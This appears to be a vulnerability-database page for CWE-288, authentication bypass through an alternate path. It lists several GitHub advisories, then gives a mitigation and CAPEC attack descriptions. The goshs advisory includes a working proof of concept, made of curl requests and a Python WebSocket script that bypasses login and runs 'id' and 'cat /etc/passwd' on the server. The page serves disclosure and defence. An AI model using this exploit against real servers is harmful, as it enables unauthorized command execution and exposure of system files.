Common Weakness Enumeration

CWE-288

Allowed

Authentication Bypass Using an Alternate Path or Channel

Abstraction: Base · Status: Incomplete

The product requires authentication, but the product has an alternate path or channel that does not require authentication.

1072 vulnerabilities reference this CWE, most recent first.

GHSA-JGFX-74G2-9R6G

Vulnerability from github – Published: 2026-04-01 20:58 – Updated: 2026-04-06 17:32
VLAI
Summary
goshs has Auth Bypass via Share Token
Details

Summary

When using the Share Token it is possible to bypass the limited selected file download with all the gosh functionalities, including code exec.

Details

The BasicAuthMiddleware checks for a ?token= parameter before checking credentials. If the token exists in SharedLinks, the request passes through with no auth check at all. The handler then processes all query parameters — including ?ws (WebSocket) which has higher priority than ?token.

// middleware.go:22-30 — token check runs FIRST
token := r.URL.Query().Get("token")
if token != "" {
    _, ok := fs.SharedLinks[token]
    if ok {
        next.ServeHTTP(w, r)  // Full auth bypass
        return
    }
}
// ... normal auth checks never reached

A share token is designed for single-file, time-limited downloads. But the middleware bypass grants access to everything — directory listing, file deletion, clipboard, WebSocket, and CLI command execution.

1. Create a webroot:

mkdir -p /tmp/goshs-webroot
echo "shareable file" > /tmp/goshs-webroot/shareable.txt

2. Start goshs with auth + TLS + CLI mode:

/tmp/goshs-test -d /tmp/goshs-webroot -b 'admin:password' -s -ss -c -p 8000

CLI mode requires auth (-b) and TLS (-s -ss). This is the documented usage — not a weakened config.

3. Verify authentication is required:

curl -sk https://localhost:8000/
Not authorized

4. As a legitimate user, create a share link:

curl -sk -u admin:password 'https://localhost:8000/shareable.txt?share'

Response:

{"urls":["https://127.0.0.1:8000/shareable.txt?token=gMP-w0hXRs-Q-FEZku63kA"]}

Save the token value (e.g., gMP-w0hXRs-Q-FEZku63kA).

5. Prove the token bypasses auth for WebSocket:

# Without token → 401 (blocked)
curl -sk -o /dev/null -w "%{http_code}" \
  -H "Connection: Upgrade" -H "Upgrade: websocket" \
  -H "Sec-WebSocket-Version: 13" -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
  'https://localhost:8000/?ws'
# 401

# With token → 101 Switching Protocols (auth bypassed!)
curl -sk -o /dev/null -w "%{http_code}" \
  -H "Connection: Upgrade" -H "Upgrade: websocket" \
  -H "Sec-WebSocket-Version: 13" -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
  'https://localhost:8000/?ws&token=gMP-w0hXRs-Q-FEZku63kA'
# 101

For a Full PoC, you can run the python file attached below, it will run id and cat /etc/passwd.

PoC

import json, ssl, websocket

TOKEN = "gMP-w0hXRs-Q-FEZku63kA"  # ← replace with your token

ws = websocket.create_connection(
    f"wss://localhost:8000/?ws&token={TOKEN}",
    sslopt={"cert_reqs": ssl.CERT_NONE},
)
print("[+] Connected WITHOUT credentials!")

# Execute 'id'
ws.send('{"type":"command","Content":"id"}')
import time; time.sleep(1)
resp = json.loads(ws.recv())
print(f"Output: {resp['content']}")
# uid=501(youruser) gid=20(staff) ...

# Execute 'cat /etc/passwd'
ws.send('{"type":"command","Content":"cat /etc/passwd"}')
time.sleep(1)
resp = json.loads(ws.recv())
print(f"Output: {resp['content']}")

ws.close()

A patch is available at https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.2.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/patrickhener/goshs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34581"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-01T20:58:48Z",
    "nvd_published_at": "2026-04-02T19:21:32Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nWhen using the `Share Token` it is possible to bypass the limited selected file download with all the gosh functionalities, including code exec.\n\n### Details\n\nThe `BasicAuthMiddleware` checks for a `?token=` parameter **before** checking credentials. If the token exists in `SharedLinks`, the request passes through with **no auth check at all**. The handler then processes all query parameters \u2014 including `?ws` (WebSocket) which has higher priority than `?token`.\n\n```go\n// middleware.go:22-30 \u2014 token check runs FIRST\ntoken := r.URL.Query().Get(\"token\")\nif token != \"\" {\n    _, ok := fs.SharedLinks[token]\n    if ok {\n        next.ServeHTTP(w, r)  // Full auth bypass\n        return\n    }\n}\n// ... normal auth checks never reached\n```\n\nA share token is designed for **single-file, time-limited downloads**. But the middleware bypass grants access to everything \u2014 directory listing, file deletion, clipboard, WebSocket, and CLI command execution.\n\n\n**1. Create a webroot:**\n\n```bash\nmkdir -p /tmp/goshs-webroot\necho \"shareable file\" \u003e /tmp/goshs-webroot/shareable.txt\n```\n\n**2. Start goshs with auth + TLS + CLI mode:**\n\n```bash\n/tmp/goshs-test -d /tmp/goshs-webroot -b \u0027admin:password\u0027 -s -ss -c -p 8000\n```\n\n\u003e CLI mode requires auth (`-b`) and TLS (`-s -ss`). This is the documented usage \u2014 not a weakened config.\n\n**3. Verify authentication is required:**\n\n```bash\ncurl -sk https://localhost:8000/\nNot authorized\n```\n\n**4. As a legitimate user, create a share link:**\n\n```bash\ncurl -sk -u admin:password \u0027https://localhost:8000/shareable.txt?share\u0027\n```\n\nResponse:\n```json\n{\"urls\":[\"https://127.0.0.1:8000/shareable.txt?token=gMP-w0hXRs-Q-FEZku63kA\"]}\n```\n\nSave the token value (e.g., `gMP-w0hXRs-Q-FEZku63kA`).\n\n**5. Prove the token bypasses auth for WebSocket:**\n\n```bash\n# Without token \u2192 401 (blocked)\ncurl -sk -o /dev/null -w \"%{http_code}\" \\\n  -H \"Connection: Upgrade\" -H \"Upgrade: websocket\" \\\n  -H \"Sec-WebSocket-Version: 13\" -H \"Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\" \\\n  \u0027https://localhost:8000/?ws\u0027\n# 401\n\n# With token \u2192 101 Switching Protocols (auth bypassed!)\ncurl -sk -o /dev/null -w \"%{http_code}\" \\\n  -H \"Connection: Upgrade\" -H \"Upgrade: websocket\" \\\n  -H \"Sec-WebSocket-Version: 13\" -H \"Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\" \\\n  \u0027https://localhost:8000/?ws\u0026token=gMP-w0hXRs-Q-FEZku63kA\u0027\n# 101\n```\n\nFor a Full PoC, you can run the python file attached below, it will run `id` and `cat /etc/passwd`.\n\n\n\n\n### PoC\n\n``` python\nimport json, ssl, websocket\n\nTOKEN = \"gMP-w0hXRs-Q-FEZku63kA\"  # \u2190 replace with your token\n\nws = websocket.create_connection(\n    f\"wss://localhost:8000/?ws\u0026token={TOKEN}\",\n    sslopt={\"cert_reqs\": ssl.CERT_NONE},\n)\nprint(\"[+] Connected WITHOUT credentials!\")\n\n# Execute \u0027id\u0027\nws.send(\u0027{\"type\":\"command\",\"Content\":\"id\"}\u0027)\nimport time; time.sleep(1)\nresp = json.loads(ws.recv())\nprint(f\"Output: {resp[\u0027content\u0027]}\")\n# uid=501(youruser) gid=20(staff) ...\n\n# Execute \u0027cat /etc/passwd\u0027\nws.send(\u0027{\"type\":\"command\",\"Content\":\"cat /etc/passwd\"}\u0027)\ntime.sleep(1)\nresp = json.loads(ws.recv())\nprint(f\"Output: {resp[\u0027content\u0027]}\")\n\nws.close()\n```\nA patch is available at https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.2.",
  "id": "GHSA-jgfx-74g2-9r6g",
  "modified": "2026-04-06T17:32:15Z",
  "published": "2026-04-01T20:58:48Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-jgfx-74g2-9r6g"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34581"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patrickhener/goshs/commit/6fb224ed15c2ccc0c61a5ebe22f2401eb06e9216"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/patrickhener/goshs"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "goshs has Auth Bypass via Share Token"
}

GHSA-JGMV-VP3C-XPJ5

Vulnerability from github – Published: 2024-10-20 09:30 – Updated: 2026-04-01 18:32
VLAI
Details

Authentication Bypass Using an Alternate Path or Channel vulnerability in Vivek Tamrakar WP REST API FNS allows Authentication Bypass.This issue affects WP REST API FNS: from n/a through 1.0.0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-49328"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288",
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-10-20T08:15:03Z",
    "severity": "CRITICAL"
  },
  "details": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Vivek Tamrakar WP REST API FNS allows Authentication Bypass.This issue affects WP REST API FNS: from n/a through 1.0.0.",
  "id": "GHSA-jgmv-vp3c-xpj5",
  "modified": "2026-04-01T18:32:06Z",
  "published": "2024-10-20T09:30:44Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-49328"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/rest-api-fns/vulnerability/wordpress-wp-rest-api-fns-plugin-plugin-1-0-0-account-takeover-vulnerability?_s_id=cve"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/rest-api-fns/wordpress-wp-rest-api-fns-plugin-plugin-1-0-0-account-takeover-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-JH73-2GQF-9G2H

Vulnerability from github – Published: 2023-06-07 03:30 – Updated: 2024-04-04 04:38
VLAI
Details

The Better Search plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.5.2. This makes it possible for unauthenticated attackers to import settings via forged request granted they can trick a site administrator into performing an action such as clicking on a link.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-4373"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288",
      "CWE-352"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-06-07T02:15:15Z",
    "severity": "MODERATE"
  },
  "details": "The Better Search plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.5.2. This makes it possible for unauthenticated attackers to import settings via forged request granted they can trick a site administrator into performing an action such as clicking on a link.",
  "id": "GHSA-jh73-2gqf-9g2h",
  "modified": "2024-04-04T04:38:50Z",
  "published": "2023-06-07T03:30:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-4373"
    },
    {
      "type": "WEB",
      "url": "https://blog.nintechnet.com/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/2473344"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cfc6c595-dad2-4abc-8187-ed72355273b8?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-JMQ5-MQX2-5F5C

Vulnerability from github – Published: 2025-03-12 12:30 – Updated: 2025-03-12 12:30
VLAI
Details

The Workreap plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.2.5. This is due to the plugin not properly validating a user's identity prior to (1) performing a social auto-login or (2) updating their profile details (e.g. password). This makes it possible for unauthenticated attackers to (1) login as an arbitrary user if their email address is known or (2) change an arbitrary user's password, including administrators, and leverage that to gain access to their account. NOTE: This vulnerability was partially fixed in version 3.2.5.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-13446"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-12T10:15:14Z",
    "severity": "CRITICAL"
  },
  "details": "The Workreap plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.2.5. This is due to the plugin not properly validating a user\u0027s identity prior to (1) performing a social auto-login or (2) updating their profile details (e.g. password). This makes it possible for unauthenticated attackers to (1) login as an arbitrary user if their email address is known or (2) change an arbitrary user\u0027s password, including administrators, and leverage that to gain access to their account. NOTE: This vulnerability was partially fixed in version 3.2.5.",
  "id": "GHSA-jmq5-mqx2-5f5c",
  "modified": "2025-03-12T12:30:57Z",
  "published": "2025-03-12T12:30:57Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13446"
    },
    {
      "type": "WEB",
      "url": "https://themeforest.net/item/workreap-freelance-marketplace-wordpress-theme/23712454"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/78c1308b-0849-4235-b2d6-0b1750a5614f?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-JMR6-WH5F-876Q

Vulnerability from github – Published: 2025-03-14 06:30 – Updated: 2025-03-14 06:30
VLAI
Details

The WP JobHunt plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 7.1. This is due to the plugin not properly verifying a user's identity prior to authenticating them through the cs_parse_request() function. This makes it possible for unauthenticated attackers to to log in to any user's account, including administrators.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-11286"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-14T05:15:40Z",
    "severity": "CRITICAL"
  },
  "details": "The WP JobHunt plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 7.1. This is due to the plugin not properly verifying a user\u0027s identity prior to authenticating them through the cs_parse_request() function. This makes it possible for unauthenticated attackers to to log in to any user\u0027s account, including administrators.",
  "id": "GHSA-jmr6-wh5f-876q",
  "modified": "2025-03-14T06:30:42Z",
  "published": "2025-03-14T06:30:42Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-11286"
    },
    {
      "type": "WEB",
      "url": "https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/91754c4d-a0d0-4d35-a70a-446d2bdf6c73?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-JMWH-PJXM-P3CM

Vulnerability from github – Published: 2026-06-15 21:30 – Updated: 2026-06-15 21:30
VLAI
Details

Unauthenticated Broken Authentication in Really Simple SSL <= 9.5.10 versions.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-48970"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-15T21:17:18Z",
    "severity": "HIGH"
  },
  "details": "Unauthenticated Broken Authentication in Really Simple SSL \u003c= 9.5.10 versions.",
  "id": "GHSA-jmwh-pjxm-p3cm",
  "modified": "2026-06-15T21:30:49Z",
  "published": "2026-06-15T21:30:49Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48970"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/plugin/really-simple-ssl/vulnerability/wordpress-really-simple-ssl-plugin-9-5-10-broken-authentication-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-JQ5G-XXG4-VW6H

Vulnerability from github – Published: 2022-05-24 19:12 – Updated: 2022-07-03 00:00
VLAI
Details

Delta Electronics DIAEnergie Version 1.7.5 and prior may allow an attacker to add a new administrative user without being authenticated or authorized, which may allow the attacker to log in and use the device with administrative privileges.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-32967"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287",
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-08-30T18:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Delta Electronics DIAEnergie Version 1.7.5 and prior may allow an attacker to add a new administrative user without being authenticated or authorized, which may allow the attacker to log in and use the device with administrative privileges.",
  "id": "GHSA-jq5g-xxg4-vw6h",
  "modified": "2022-07-03T00:00:24Z",
  "published": "2022-05-24T19:12:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32967"
    },
    {
      "type": "WEB",
      "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-238-03"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-JQJ3-FH4V-X7HJ

Vulnerability from github – Published: 2025-03-13 18:32 – Updated: 2025-03-13 18:32
VLAI
Details

Optigo Networks Visual BACnet Capture Tool and Optigo Visual Networks Capture Tool version 3.1.2rc11 contain an exposed web management service that could allow an attacker to bypass authentication measures and gain controls over utilities within the products.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-2080"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-13T17:15:38Z",
    "severity": "CRITICAL"
  },
  "details": "Optigo Networks Visual BACnet Capture Tool and Optigo Visual Networks Capture Tool version 3.1.2rc11 contain an exposed web management service that could allow an attacker to bypass authentication measures and gain controls over utilities within the products.",
  "id": "GHSA-jqj3-fh4v-x7hj",
  "modified": "2025-03-13T18:32:23Z",
  "published": "2025-03-13T18:32:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2080"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-070-02"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-JQMQ-FPWV-P925

Vulnerability from github – Published: 2025-10-30 00:31 – Updated: 2025-10-30 17:06
VLAI
Summary
Drupal Simple OAuth (OAuth2) & OpenID Connect allows Authentication Bypass
Details

Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal Simple OAuth (OAuth2) & OpenID Connect allows Authentication Bypass. This issue affects Simple OAuth (OAuth2) & OpenID Connect: from 6.0.0 before 6.0.7.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "drupal/simple_oauth"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0.0"
            },
            {
              "fixed": "6.0.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-12466"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-30T17:06:19Z",
    "nvd_published_at": "2025-10-30T00:15:34Z",
    "severity": "HIGH"
  },
  "details": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal Simple OAuth (OAuth2) \u0026 OpenID Connect allows Authentication Bypass. This issue affects Simple OAuth (OAuth2) \u0026 OpenID Connect: from 6.0.0 before 6.0.7.",
  "id": "GHSA-jqmq-fpwv-p925",
  "modified": "2025-10-30T17:06:19Z",
  "published": "2025-10-30T00:31:04Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12466"
    },
    {
      "type": "WEB",
      "url": "https://www.drupal.org/sa-contrib-2025-114"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Drupal Simple OAuth (OAuth2) \u0026 OpenID Connect allows Authentication Bypass"
}

GHSA-JRMW-X68C-2F58

Vulnerability from github – Published: 2025-02-27 09:31 – Updated: 2026-04-08 21:33
VLAI
Details

The Login Me Now plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.7.2. This is due to insecure authentication based on an arbitrary transient name in the 'AutoLogin::listen()' function. This makes it possible for unauthenticated attackers to log in an existing user on the site, even an administrator. Note: this vulnerability requires using a transient name and value from another software, so the plugin is not inherently vulnerable on it's own.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-1717"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288",
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-02-27T08:15:31Z",
    "severity": "HIGH"
  },
  "details": "The Login Me Now plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.7.2. This is due to insecure authentication based on an arbitrary transient name in the \u0027AutoLogin::listen()\u0027 function. This makes it possible for unauthenticated attackers to log in an existing user on the site, even an administrator. Note: this vulnerability requires using a transient name and value from another software, so the plugin is not inherently vulnerable on it\u0027s own.",
  "id": "GHSA-jrmw-x68c-2f58",
  "modified": "2026-04-08T21:33:03Z",
  "published": "2025-02-27T09:31:45Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1717"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/login-me-now/tags/1.7.2/app/Logins/BrowserTokenLogin/AutoLogin.php#L24"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3247924/login-me-now"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fc689622-50d6-47c4-a5f6-0314b1a207c9?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

Funnel all access through a single choke point to simplify how users can access a resource. For every access, perform a check to determine if the user has permissions to access the resource.

CAPEC-127: Directory Indexing

An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory's contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks.

CAPEC-665: Exploitation of Thunderbolt Protection Flaws

An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.